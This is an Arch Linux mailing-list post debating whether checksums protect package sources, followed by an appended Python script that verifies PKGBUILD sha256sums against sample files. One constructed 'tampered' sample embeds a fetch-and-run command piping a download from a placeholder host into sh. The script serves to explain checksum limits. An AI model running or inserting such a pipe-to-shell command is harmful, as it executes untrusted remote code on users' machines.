[arch-general] ensuring integrity of sources (was: [arch-dev-public] todo list for moving http -> https sources)

Leonid Isaev leonid.isaev at jila.colorado.edu
Tue Nov 1 05:07:42 UTC 2016


On Tue, Nov 01, 2016 at 03:59:28AM +0100, Lukas Rose wrote:
> > On 01 Nov 2016, at 00:35, Leonid Isaev <leonid.isaev at jila.colorado.edu> wrote:
> > 
> > Well, my mentality is that authenticating plain-text data is usually not
> > necessary because a user can always inspect it
> 
> You just can't reliably inspect plain text install data, unless you spend an
> awful lot of time on it. As already pointed out, it's just too easy to miss
> out small malicious changes. And even if you were able to spot those, most
> average users won't, and that's what policies are meant for: the average
> user.

Perhaps you should try it yourself instead of arguing? I have been doing this
since 2010 with about 50 packages. PKGBUILDs are not usually long and therefore
easy to grasp with a single glance.

> > Regarding checksums, how did a dev know that upstream sources are authentic?
> 
> It's not about the upstream source to be authentic, it's about the upstream
> source reached your hard drive without further (malicious) modification. That
> said, you can't expect a package maintainer to review all the code he uses
> (indirectly) in his package. If you use another (open source) project, that
> one could always be malicious. But we'll assume that case not likely (in
> general).

On the contrary, planting backdoors in OSS projects is a very likely scenario,
that has happened multiple times already [1-3]...

> It is much more likely that an attacker will try to break things
> you install (although I still assume that this is not often), than a group of
> attackers hiding malicious software in an (open source) project.

Where is such confidence coming from?

> The former
> can be easily locked out by checksums, the latter only by extensive code
> reviews. And even if they were done, you'd still have to trust the one who
> did the review. Since there's an easy fix for the former, let's use it. Since
> there is none for the latter, let's keep an eye on this. There's always trust
> to a certain degree.

I can't really disentangle this pile of... thoughts.

Cheers,
L.

[1] https://en.wikipedia.org/wiki/Vsftpd
[2] http://arstechnica.com/business/2012/02/malicious-backdoor-in-open-source-messaging-apps-not-spotted-for-4-months/
[3] http://security.stackexchange.com/questions/23334/example-of-a-backdoor-submitted-to-an-open-source-project

> 
> Cheers, Lukas

-- 
Leonid Isaev
GPG fingerprints: DA92 034D B4A8 EC51 7EA6  20DF 9291 EE8A 043C B8C4
                  C0DF 20D0 C075 C3F1 E1BE  775A A7AE F6CB 164B 5A6D
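The two sides of this exchange disagree about what a checksum line in a PKGBUILD buys you. The following script, added here as an illustration and not code from the thread, from Arch's makepkg, or from either poster, makes the distinction concrete: it parses the `source=()` and `sha256sums=()` arrays of a PKGBUILD and checks fetched files against them. The sample PKGBUILD, the URL (`example.invalid`), and the "tarball" bytes are all constructed for the example; the parser is deliberately minimal (no `$pkgver` expansion, no comment handling) and is not a replacement for makepkg's own verification.

```python
import hashlib
import re

# Matches a bash array assignment such as  source=( ... )  spanning lines.
ARRAY_RE = re.compile(r"^(\w+)=\((.*?)\)", re.S | re.M)
# Matches one array element: single-quoted, double-quoted, or bare word.
TOKEN_RE = re.compile(r"""'([^']*)'|"([^"]*)"|(\S+)""")


def parse_arrays(pkgbuild: str) -> dict:
    """Return {array_name: [elements]} for every bash array in the PKGBUILD text."""
    arrays = {}
    for m in ARRAY_RE.finditer(pkgbuild):
        name, body = m.group(1), m.group(2)
        arrays[name] = [a or b or c for a, b, c in TOKEN_RE.findall(body)]
    return arrays


def local_name(entry: str) -> str:
    """Local file name of a source entry: 'name::url' form, else the URL basename."""
    if "::" in entry:
        return entry.split("::", 1)[0]
    return entry.rsplit("/", 1)[-1]


def verify_sources(pkgbuild: str, fetched: dict) -> dict:
    """Check each source file in `fetched` ({name: bytes}) against sha256sums.

    Returns {name: 'ok' | 'MISMATCH' | 'missing' | 'skipped'}.
    """
    arrays = parse_arrays(pkgbuild)
    sources = arrays.get("source", [])
    sums = arrays.get("sha256sums", [])
    if len(sums) != len(sources):
        raise ValueError("sha256sums has %d entries, source has %d" % (len(sums), len(sources)))
    result = {}
    for entry, expected in zip(sources, sums):
        name = local_name(entry)
        if expected == "SKIP":          # nothing to verify; the file is accepted as-is
            result[name] = "skipped"
            continue
        data = fetched.get(name)
        if data is None:
            result[name] = "missing"
            continue
        actual = hashlib.sha256(data).hexdigest()
        result[name] = "ok" if actual == expected.lower() else "MISMATCH"
    return result


# ---- constructed sample data (not a real package or tarball) ----------------
GOOD_TARBALL = b"example-1.0: pretend this is the upstream tarball\n"
# The same tarball with bytes injected in transit (e.g. over plain http).
TAMPERED_TARBALL = GOOD_TARBALL + b"curl http://example.invalid/x | sh\n"
# A release in which upstream itself shipped the backdoor.
BACKDOORED_TARBALL = b"example-1.0: upstream tarball with a backdoor already inside\n"


def make_pkgbuild(digest: str) -> str:
    """Build a minimal constructed PKGBUILD whose tarball checksum is `digest`."""
    return (
        "pkgname=example\n"
        "pkgver=1.0\n"
        'source=("https://example.invalid/example-1.0.tar.gz"\n'
        '        "example.patch")\n'
        "sha256sums=('" + digest + "'\n"
        "            'SKIP')\n"
    )


# Maintainer pinned the checksum of the clean release.
SAMPLE_PKGBUILD = make_pkgbuild(hashlib.sha256(GOOD_TARBALL).hexdigest())
# Maintainer pinned the checksum of a release that was backdoored upstream:
# the checksum is computed from the backdoored bytes, so it verifies cleanly.
BACKDOORED_PKGBUILD = make_pkgbuild(hashlib.sha256(BACKDOORED_TARBALL).hexdigest())


if __name__ == "__main__":
    print("clean fetch:     ", verify_sources(SAMPLE_PKGBUILD, {"example-1.0.tar.gz": GOOD_TARBALL}))
    print("tampered fetch:  ", verify_sources(SAMPLE_PKGBUILD, {"example-1.0.tar.gz": TAMPERED_TARBALL}))
    print("backdoored upstr:", verify_sources(BACKDOORED_PKGBUILD, {"example-1.0.tar.gz": BACKDOORED_TARBALL}))
```

Run as a script, the first call reports `ok`, the second `MISMATCH`, and the third `ok` as well: the checksum catches a file altered between upstream and the user's disk, which is the case Lukas describes, but it says nothing about whether upstream's own release was trustworthy, which is the case Leonid's references [1-3] are about. A `SKIP` entry verifies nothing at all.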